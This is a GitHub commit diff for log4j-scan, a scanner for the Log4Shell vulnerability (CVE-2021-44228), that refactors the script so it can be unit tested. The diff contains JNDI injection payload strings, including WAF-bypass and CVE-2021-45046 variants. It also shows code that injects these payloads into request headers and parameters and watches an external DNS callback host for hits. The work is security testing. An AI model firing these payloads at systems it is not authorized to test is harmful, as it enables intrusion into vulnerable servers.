Skip to content
This repository has been archived by the owner on Mar 2, 2022. It is now read-only.

Commit

Permalink
Fix fullhunt#86 : Refactor the code to support unit test
Browse files Browse the repository at this point in the history
  • Loading branch information
axel3rd committed Dec 22, 2021
1 parent ba80946 commit 7696c80
Show file tree
Hide file tree
Showing 7 changed files with 145 additions and 460 deletions.
11 changes: 11 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
name: Test
on: push
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
- run: pip install -r requirements.txt
- run: pip install -r tests/requirements.txt
- run: pytest
6 changes: 4 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -119,13 +119,15 @@ docker run -it --rm -v $PWD:/data log4j-scan -l /data/urls.txt
```
virtualenv ~/tmp/venv-log4j-scan
source ~/tmp/venv-log4j-scan/bin/activate
pip install -r requirements.txt
pip install -r tests/requirements.txt

# Execute all unit tests
pytest

# Execute one unit test method
pytest tests/test_log4j-scan.py::test_default
# Way to execute one unit test method
pytest -k "default"
pytest tests/test_log4j_scan.py::test_default
```

**NB**: Could only be executed on Linux, *termios* pip module can't be installed on Windows.
Expand Down
198 changes: 104 additions & 94 deletions log4j-scan.py
Original file line number Diff line number Diff line change
Expand Up @@ -24,24 +24,13 @@
from Crypto.Hash import SHA256
from termcolor import cprint


# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass


cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")

if len(sys.argv) <= 1:
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)


default_headers = {
'User-Agent': 'log4j-scan (https://github.com/mazen160/log4j-scan)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36',
Expand All @@ -61,88 +50,85 @@
]

cve_2021_45046 = [
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
"${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
"${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
]


parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-p", "--proxy",
dest="proxy",
help="send requests through proxy",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("--request-type",
dest="request_type",
help="Request Type: (get, post) - [Default: get].",
default="get",
action='store')
parser.add_argument("--headers-file",
dest="headers_file",
help="Headers fuzzing list - [default: headers.txt].",
default="headers.txt",
action='store')
parser.add_argument("--run-all-tests",
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
action='store_true')
parser.add_argument("--wait-time",
dest="wait_time",
help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
default=5,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
action='store_true')
parser.add_argument("--test-CVE-2021-45046",
dest="cve_2021_45046",
help="Test using payloads for CVE-2021-45046 (detection payloads).",
action='store_true')
parser.add_argument("--dns-callback-provider",
dest="dns_callback_provider",
help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
default="interact.sh",
action='store')
parser.add_argument("--custom-dns-callback-host",
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
action='store_true')

args = parser.parse_args()


proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}

def get_fuzzing_headers(payload):
def parse_args(args_input):
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-p", "--proxy",
dest="proxy",
help="send requests through proxy",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("--request-type",
dest="request_type",
help="Request Type: (get, post) - [Default: get].",
default="get",
action='store')
parser.add_argument("--headers-file",
dest="headers_file",
help="Headers fuzzing list - [default: headers.txt].",
default="headers.txt",
action='store')
parser.add_argument("--run-all-tests",
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
action='store_true')
parser.add_argument("--wait-time",
dest="wait_time",
help="Wait time after all URLs are processed (in seconds) - [Default: 5].",
default=5,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
action='store_true')
parser.add_argument("--test-CVE-2021-45046",
dest="cve_2021_45046",
help="Test using payloads for CVE-2021-45046 (detection payloads).",
action='store_true')
parser.add_argument("--dns-callback-provider",
dest="dns_callback_provider",
help="DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].",
default="interact.sh",
action='store')
parser.add_argument("--custom-dns-callback-host",
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
action='store_true')

return parser.parse_args(args_input)


def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(args.headers_file, "r") as f:
with open(headers_file, "r") as f:
for i in f.readlines():
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
if args.exclude_user_agent_fuzzing:
if exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]

fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
Expand All @@ -164,6 +150,7 @@ def generate_waf_bypass_payloads(callback_host, random_string):
payloads.append(new_payload)
return payloads


def get_cve_2021_45046_payloads(callback_host, random_string):
payloads = []
for i in cve_2021_45046:
Expand All @@ -174,23 +161,26 @@ def get_cve_2021_45046_payloads(callback_host, random_string):


class Dnslog(object):
def __init__(self):

def __init__(self, proxies: {}):
self.proxies = proxies
self.s = requests.session()
req = self.s.get("http://www.dnslog.cn/getdomain.php",
proxies=proxies,
proxies=self.proxies,
timeout=30)
self.domain = req.text

def pull_logs(self):
req = self.s.get("http://www.dnslog.cn/getrecords.php",
proxies=proxies,
proxies=self.proxies,
timeout=30)
return req.json()


class Interactsh:

# Source: https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/modules/interactsh/__init__.py
def __init__(self, token="", server=""):
def __init__(self, proxies: {}, token="", server=""):
rsa = RSA.generate(2048)
self.public_key = rsa.publickey().exportKey()
self.private_key = rsa.exportKey()
Expand Down Expand Up @@ -274,11 +264,11 @@ def parse_url(url):

return({"scheme": scheme,
"site": f"{scheme}://{urlparse.urlparse(url).netloc}",
"host": urlparse.urlparse(url).netloc.split(":")[0],
"host": urlparse.urlparse(url).netloc.split(":")[0],
"file_path": file_path})


def scan_url(url, callback_host):
def scan_url(url, callback_host, proxies, args):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
Expand All @@ -296,7 +286,7 @@ def scan_url(url, callback_host):
requests.request(url=url,
method="GET",
params={"v": payload},
headers=get_fuzzing_headers(payload),
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
Expand Down Expand Up @@ -334,7 +324,18 @@ def scan_url(url, callback_host):
cprint(f"EXCEPTION: {e}")


def main():
def main(options):

args = parse_args(options)

if not args.url and not args.usedlist:
cprint("[•] Parameter '-u' or '-l' is required.", "red")
return

proxies = {}
if args.proxy:
proxies = {"http": args.proxy, "https": args.proxy}

urls = []
if args.url:
urls.append(args.url)
Expand All @@ -349,21 +350,21 @@ def main():
dns_callback_host = ""
if args.custom_dns_callback_host:
cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
dns_callback_host = args.custom_dns_callback_host
dns_callback_host = args.custom_dns_callback_host
else:
cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
if args.dns_callback_provider == "interact.sh":
dns_callback = Interactsh()
dns_callback = Interactsh(proxies=proxies)
elif args.dns_callback_provider == "dnslog.cn":
dns_callback = Dnslog()
dns_callback = Dnslog(proxies=proxies)
else:
raise ValueError("Invalid DNS Callback provider")
dns_callback_host = dns_callback.domain

cprint("[%] Checking for Log4j RCE CVE-2021-44228.", "magenta")
for url in urls:
cprint(f"[•] URL: {url}", "magenta")
scan_url(url, dns_callback_host)
scan_url(url, dns_callback_host, proxies, args)

if args.custom_dns_callback_host:
cprint("[•] Payloads sent to all URLs. Custom DNS Callback host is provided, please check your logs to verify the existence of the vulnerability. Exiting.", "cyan")
Expand All @@ -383,7 +384,16 @@ def main():

if __name__ == "__main__":
try:
main()

cprint('[•] CVE-2021-44228 - Apache Log4j RCE Scanner', "green")
cprint('[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.', "yellow")
cprint('[•] Secure your External Attack Surface with FullHunt.io.', "yellow")

if len(sys.argv) <= 1:
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)

main(sys.argv[1:])
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
Expand Down
Loading

0 comments on commit 7696c80

Please sign in to comment.